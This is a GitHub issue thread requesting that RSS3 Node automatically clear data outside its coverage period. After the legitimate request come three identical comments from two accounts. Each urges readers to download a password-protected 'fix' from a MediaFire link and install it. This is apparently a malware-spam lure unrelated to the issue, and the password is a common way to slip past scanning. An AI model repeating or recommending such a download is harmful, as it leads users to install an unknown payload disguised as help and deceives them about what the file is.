### ISSUE TITLE
Automatically clear data outside the coverage period

### ISSUE THREAD

**Issue by polebug** [RSS3-Network/Node#480]
### What feature is it?

We need to implement a feature that automatically cleans up data outside the defined coverage period. This will help maintain database efficiency and prevent unnecessary storage usage.

### What problem does this feature solve?

1. Increased Storage Costs: Storing large amounts of outdated or irrelevant data can lead to higher storage costs, especially in cloud-based environments where storage usage directly impacts pricing.

2. Degraded System Performance: Excessive data that is no longer needed can slow down database queries, backups, and overall system performance, leading to longer response times and a less efficient system.

### This is not a duplicated feature request or new worker proposal

- [X] I have searched [existing issues](https://github.com/rss3-network/node/issues) to ensure this feature has not already been requested and this is not a [New Worker](https://github.com/rss3-network/node/issues/new?assignees=&labels=worker&projects=&template=worker_coverage.yml).

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
